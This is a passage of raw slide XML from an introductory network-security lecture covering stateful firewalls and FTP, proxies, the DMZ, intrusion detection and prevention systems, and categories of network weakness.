                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>state table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>) in order to monitor the state of a communication session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Symbol"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>More intelligent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Example: FTP Traffic passing by Firewall</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57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FTP utilizes two ports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Data port 20 (on active may be random port specified in request) </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Command port 21
 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="572" name="Picture 3"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352680" y="3419640"/>
            <a:ext cx="3038040" cy="2676240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="573" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4267080" y="6095880"/>
            <a:ext cx="144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rPr>
              <a:t>Active FTP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Stateful Inspection with FTP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="575" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2554200"/>
            <a:ext cx="7772040" cy="2739960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="576" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533520" y="5105520"/>
            <a:ext cx="144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rPr>
              <a:t>FTP Client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="577" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7315200" y="5181480"/>
            <a:ext cx="144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Arial"/>
              </a:rPr>
              <a:t>FTP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Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129"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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Vulnerability is the degree of weakness which is inherent in every network and device. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1" dirty="0">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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Primary vulnerabilities or weaknesses: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="743040" lvl="1" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Symbol"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Technological weaknesses </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1" dirty="0">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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Configuration weaknesses </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1" dirty="0">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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Security policy weaknesses</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1" dirty="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a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1" dirty="0">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Dynamic Packet Filtering Limitations</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="579"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Cannot make filtering based on the payload (data)</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 prevention of application layer attacks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Not all protocols are stateful (UDP, ICMP)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Proxy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="581"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Application gateway or forwarder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Symbol"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Maintains complete TCP connection state and sequencing through 2 connections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Session user to proxy</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Proxy to destination server</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Process table manages to keep the connections straight </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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500" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Address translation built-in </a:t>
            </a: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500" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Must change the application (Web browser) to include the proxy settings </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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extShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="457200"/>
            <a:ext cx="7772040" cy="990360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="A50021"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Georgia"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="A50021"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Georgia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="A50021"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Georgia"/>
              </a:rPr>
              <a:t>DMZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="A50021"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Georgia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="A50021"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Georgia"/>
              </a:rPr>
              <a:t>Zone</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="583"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The De-Militarized Zone, or DMZ, is an expression that comes from the Korean War.</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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>a portion of your network which, although under your control, is outside your heaviest security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>”</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Machines placed in the DMZ usually </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" u="sng" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>offer services to the public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>, like Web services, domain name services (DNS), and FTP services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extShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1197000"/>
            <a:ext cx="7772040" cy="1469520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12600">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="A50021"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Georgia"/>
              </a:rPr>
              <a:t>IDS/IPS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="585" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="3581280"/>
            <a:ext cx="6400440" cy="1752120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyP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Intrusion Detection and Prevention</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="587"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Host-based</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HIDS, HIPS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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Network-based</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NIDS, NIPS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:u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Intrusion Detection Systems</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="589"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An IDS is any combination of hardware &amp; software that monitors a system or network for malicious activity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="24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Examples of IDSs in real life</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Car alarms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Fire detectors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House alarms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Surveillance systems</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100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IDS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59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Reports attacks against monitored systems/networks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Mature Technology that has significant utilization</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Not a replacement for firewalls, strong policies, system hardening, timely patching, and other DiD techniques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Not a low maintenance tool</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Not an inexpensive tool</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Not a silver bullet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="24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NIDS Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="593"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Deployed as a passive sensor at network aggregation points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Captures traffic like a sniffer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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Detects EOI on the network</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Uses signature, anomaly, or application/protocol analysis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IDS Operation </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="595"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Captures all traffic passing in a network</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Compares the packet to a number of known packet attacks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If an attack is detected an action is taken</a:t>
            </a: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Log suspicious events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Save raw packet captures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Send an alert (e-mail, message to network management system)</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Reset connection</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Interact with a firewall to modify the rules and block the attacking host</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>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IDS Parts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="597"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Engine</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Capture and analyze the traffic</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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Console</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Manage engine and run reports</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>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Technological Weakness</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1752480"/>
            <a:ext cx="7772040" cy="4343040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="438840" indent="-319680">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>TCP/IP protocol weakness</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="731520" lvl="1" indent="-273960">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Hypertext Transfer Protocol (HTTP), File Transfer Protocol (FTP) and Internet Control Message Protocol (ICMP) are inherently insecure.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="438840" indent="-319680">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Operating system weakness</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="731520" lvl="1" indent="-273960">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Each operating system has security problems that must be addressed.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="731520" lvl="1" indent="-273960">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>UNIX, Linux, Mac OS, Mac OS X, Windows NT, 9x, 2K, XP, and Vista.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="731520" lvl="1" indent="-273960">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
